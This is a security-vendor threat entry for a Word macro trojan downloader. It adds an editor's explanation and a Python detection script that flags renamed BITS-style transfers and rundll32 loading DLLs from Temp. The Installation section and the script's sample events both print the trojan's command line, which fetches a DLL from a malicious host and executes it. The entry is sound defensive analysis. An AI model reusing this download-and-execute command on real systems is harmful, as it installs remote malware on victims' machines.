Trojan.W97M.BITSLODR.POL
March 17, 2020
ALIASES:
TrojanDownloader:O97M/Powdow.ARJ!MTB (Microsoft); VBA/TrojanDownloader.Agent.RZD trojan (NOD32)
PLATFORM:
Windows
Threat Type: Trojan
Destructiveness: No
In the wild: Yes
OVERVIEW
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
However, as of this writing, the said sites are inaccessible.
TECHNICAL DETAILS
File Size: 93,441 bytes
Memory Resident: No
Initial Samples Received Date: 13 Mar 2020
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan drops the following files:
- %Temp%\curl.com
It adds the following processes:
- "%System%\cmd.exe" /c %Temp%\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab %Temp%\12345.dll&& rundll32 %Temp%\12345.dll,DllRegisterServer
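The command line above runs a file named curl.com from %Temp% with a `/transfer jobname <remote URL> <local file>` argument list, fetches a DLL, and immediately registers it with rundll32. That argument syntax is the one used by the Windows BITS client bitsadmin.exe, so the dropped curl.com is best read as a renamed copy of a download utility (an editor's observation, not a statement from the entry). The Python below is an added detection example, not code from the Trend Micro entry; it scans process-creation log lines in a constructed `pid=... image=... cmdline="..."` format (an assumed format, not any product's log layout) and flags the three traits visible in the entry: a `/transfer` verb invoked through a non-bitsadmin image name or from a Temp directory, a transfer whose destination is a DLL, and rundll32 registering a DLL out of Temp.

```python
import re

# Constructed sample events (not taken from the original page). The third line
# mirrors the command line listed under Installation; the fourth is the child
# rundll32 process it spawns. Paths and PIDs are invented for the example.
SAMPLE_EVENTS = [
    r'2020-03-13T10:01:02 pid=412 image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c dir"',
    r'2020-03-13T10:02:15 pid=508 image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer updatejob http://example.invalid/patch.cab C:\Users\victim\Downloads\patch.cab"',
    r'2020-03-13T10:03:40 pid=620 image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c C:\Users\victim\AppData\Local\Temp\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab C:\Users\victim\AppData\Local\Temp\12345.dll&& rundll32 C:\Users\victim\AppData\Local\Temp\12345.dll,DllRegisterServer"',
    r'2020-03-13T10:04:01 pid=700 image=C:\Windows\System32\rundll32.exe cmdline="rundll32 C:\Users\victim\AppData\Local\Temp\12345.dll,DllRegisterServer"',
]

# Assumed event layout: "... pid=<n> ... cmdline="<command line>"" at end of line.
EVENT_RE = re.compile(r'pid=(\d+)\s.*?cmdline="(.*)"$')
# Matches a path under a Temp directory or the unexpanded %Temp% variable.
TEMP_DIR = re.compile(r'(?:\\temp\\|%temp%)', re.IGNORECASE)
# rundll32 <dll>,DllRegisterServer (the export called in the entry's command line).
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+(\S+?),DllRegisterServer', re.IGNORECASE)


def check_transfer(cmd):
    """Flag BITS-style /transfer invocations that do not look like normal bitsadmin use."""
    reasons = []
    tokens = cmd.split()
    for i, tok in enumerate(tokens):
        if tok.lower() != '/transfer' or i == 0:
            continue
        invoker = tokens[i - 1]                       # program that received /transfer
        name = invoker.rsplit('\\', 1)[-1].lower()
        if name not in ('bitsadmin.exe', 'bitsadmin'):
            reasons.append(f"/transfer verb invoked via non-bitsadmin image name '{name}'")
        if TEMP_DIR.search(invoker):
            reasons.append("download client executed from a Temp directory")
        # bitsadmin syntax: /transfer <job name> <remote URL> <local file>
        if i + 3 < len(tokens):
            dest = tokens[i + 3].rstrip('&')          # strip a glued "&&" chain operator
            if dest.lower().endswith('.dll'):
                reasons.append(f"transfer writes a DLL to {dest}")
    return reasons


def check_rundll32(cmd):
    """Flag rundll32 registering a DLL that lives in a Temp directory."""
    reasons = []
    for m in RUNDLL_RE.finditer(cmd):
        dll = m.group(1)
        if TEMP_DIR.search(dll):
            reasons.append(f"rundll32 calls DllRegisterServer on a Temp DLL: {dll}")
    return reasons


def scan(lines):
    """Return [(pid, [reason, ...]), ...] for every event that trips a rule."""
    hits = []
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue
        pid, cmd = int(m.group(1)), m.group(2)
        reasons = check_transfer(cmd) + check_rundll32(cmd)
        if reasons:
            hits.append((pid, reasons))
    return hits


if __name__ == '__main__':
    for pid, reasons in scan(SAMPLE_EVENTS):
        print(f"pid {pid}:")
        for r in reasons:
            print(f"  - {r}")
```

The benign bitsadmin event (pid 508) produces no hit because the verb comes from the real bitsadmin image and the destination is a .cab, while the cmd.exe line from the entry (pid 620) trips all four checks and its rundll32 child (pid 700) trips the Temp-DLL registration check. Keying the rule on the `/transfer` argument shape rather than on the image name is what catches the renamed copy.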
Other Details
This Trojan connects to the following possibly malicious URL:
- http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab
However, as of this writing, the said URL is inaccessible.